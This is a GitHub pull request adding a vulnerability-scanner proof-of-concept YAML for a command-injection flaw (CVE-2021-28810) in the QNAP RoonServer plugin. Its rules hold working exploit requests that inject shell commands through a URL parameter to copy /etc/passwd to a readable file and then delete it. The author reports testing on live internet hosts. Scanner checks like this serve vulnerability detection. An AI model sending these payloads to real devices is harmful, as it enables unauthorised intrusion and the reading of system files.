### PR TITLE
Create qnap-cve-2021-28810.yml

### DIFF
--- a/pocs/qnap-cve-2021-28810.yml
+++ b/pocs/qnap-cve-2021-28810.yml
@@ -1,0 +1,25 @@
+name: poc-yaml-qnap-cve-2021-28810
+set:
+  rand: randomInt(1000, 9999)
+  r1: randomLowercase(4)
+rules:
+    - method: Get
+      path: /cgi-bin/qpkg/RoonServer/ajax/ajax.php?a=updateformfield&t=`cat%20/etc/passwd%20>{{r1}}`
+      headers:
+        cookie: NAS_USER={{rand}}
+      expression: |
+        response.status == 200 && !response.body.bcontains(b"not logged in")
+    - method: GET
+      path: /cgi-bin/qpkg/RoonServer/ajax/{{r1}}
+      expression: |
+        response.status == 200 && response.body.bcontains(b"admin:x:0:0")
+    - method: POST
+      path: /cgi-bin/qpkg/RoonServer/ajax/ajax.php?a=updateformfield&t=`rm%20-rf%20{{r1}}`
+      headers:
+        cookie: NAS_USER={{rand}}
+      expression: |
+        response.status == 200 && !response.body.bcontains(b"not logged in")
+detail:
+    author: albertchang
+    links:
+        - https://mp.weixin.qq.com/s/xfT3LkYNlzFYJdG1z0c7ug

--- a/pocs/qnap-cve-2021-28810.yml
+++ b/pocs/qnap-cve-2021-28810.yml
@@ -3,7 +3,7 @@ set:
   rand: randomInt(1000, 9999)
   r1: randomLowercase(4)
 rules:
-    - method: Get
+    - method: GET
       path: /cgi-bin/qpkg/RoonServer/ajax/ajax.php?a=updateformfield&t=`cat%20/etc/passwd%20>{{r1}}`
       headers:
         cookie: NAS_USER={{rand}}

--- a/pocs/qnap-cve-2021-28810.yml
+++ b/pocs/qnap-cve-2021-28810.yml
@@ -3,23 +3,23 @@ set:
   rand: randomInt(1000, 9999)
   r1: randomLowercase(4)
 rules:
-    - method: GET
-      path: /cgi-bin/qpkg/RoonServer/ajax/ajax.php?a=updateformfield&t=`cat%20/etc/passwd%20>{{r1}}`
-      headers:
-        cookie: NAS_USER={{rand}}
-      expression: |
-        response.status == 200 && !response.body.bcontains(b"not logged in")
-    - method: GET
-      path: /cgi-bin/qpkg/RoonServer/ajax/{{r1}}
-      expression: |
-        response.status == 200 && response.body.bcontains(b"admin:x:0:0")
-    - method: POST
-      path: /cgi-bin/qpkg/RoonServer/ajax/ajax.php?a=updateformfield&t=`rm%20-rf%20{{r1}}`
-      headers:
-        cookie: NAS_USER={{rand}}
-      expression: |
-        response.status == 200 && !response.body.bcontains(b"not logged in")
+  - method: GET
+    path: /cgi-bin/qpkg/RoonServer/ajax/ajax.php?a=updateformfield&t=`cat%20/etc/passwd%20>{{r1}}`
+    headers:
+      cookie: NAS_USER={{rand}}
+    expression: |
+      response.status == 200 && !response.body.bcontains(b"not logged in")
+  - method: GET
+    path: /cgi-bin/qpkg/RoonServer/ajax/{{r1}}
+    expression: |
+      response.status == 200 && response.body.bcontains(b"admin:x:0:0")
+  - method: POST
+    path: /cgi-bin/qpkg/RoonServer/ajax/ajax.php?a=updateformfield&t=`rm%20-rf%20{{r1}}`
+    headers:
+      cookie: NAS_USER={{rand}}
+    expression: |
+      response.status == 200 && !response.body.bcontains(b"not logged in")
 detail:
-    author: albertchang
-    links:
-        - https://mp.weixin.qq.com/s/xfT3LkYNlzFYJdG1z0c7ug
+  author: albertchang
+  links:
+    - https://mp.weixin.qq.com/s/xfT3LkYNlzFYJdG1z0c7ug


### PR DESCRIPTION
**请先认真阅读下列要求，如不符合会被直接关闭 PR**

- 确保当前 POC 与已有的 POC 没有重复，除了仓库 `pocs` 目录中的，还有内置的几个用 Go 写的 POC也不要重复：
  ```
  poc-go-php-cve-2019-11043-rce
  poc-go-seeyon-htmlofficeservlet-rce
  poc-go-tongda-lfi-upload-rce
  poc-go-tongda-arbitrary-auth
  poc-go-ecology-dbconfig-info-leak
  poc-go-tomcat-put
  poc-go-tomcat-cve-2020-1938
  ```
  
- 阅读规范和要求 
  - https://chaitin.github.io/xray/#/guide/contribute
  - https://chaitin.github.io/xray/#/guide/high_quality_poc

- 一个 pull request 只提交一个 poc

- 对于 0day / 1 day 等未大面积公开细节的漏洞请勿提交，可以私聊群管理员

 - 不接受没有测试环境的 poc，测试环境可以使用 [vulhub](https://github.com/vulhub/vulhub/) 或 [vulnapps](https://github.com/Medicean/VulApps)，也可以提供 fofa/zoomeye/shodan 等搜索关键字。 请勿直接填写公网上未修复的站点的地址，如果有特殊情况，请私聊群内管理解决。
 
- 如果你的 poc 被合并或者没有合并但是评论说需要发送奖励，请查看 https://chaitin.github.io/xray/#/guide/feedback 并添加最下面的微信，说明你的 poc 地址，方便发送奖励。

**我是分割线，在提交 poc 填写说明的时候，请务必阅读上方要求，然后删除本分割线和上方的内容，只保留下面自定义的部分即可，否则不予通过。**

----------

## 本 poc 是检测什么漏洞的
qnap RoonServer 插件远程代码执行漏洞
## 测试环境
实网测试
## 备注
RoonSever版本小于等于2021-02-01
<img width="930" alt="截屏2021-08-31 下午2 29 10" src="https://user-images.githubusercontent.com/17517153/131453157-321cdea4-3d81-4526-a3cb-ae84ca994591.png">
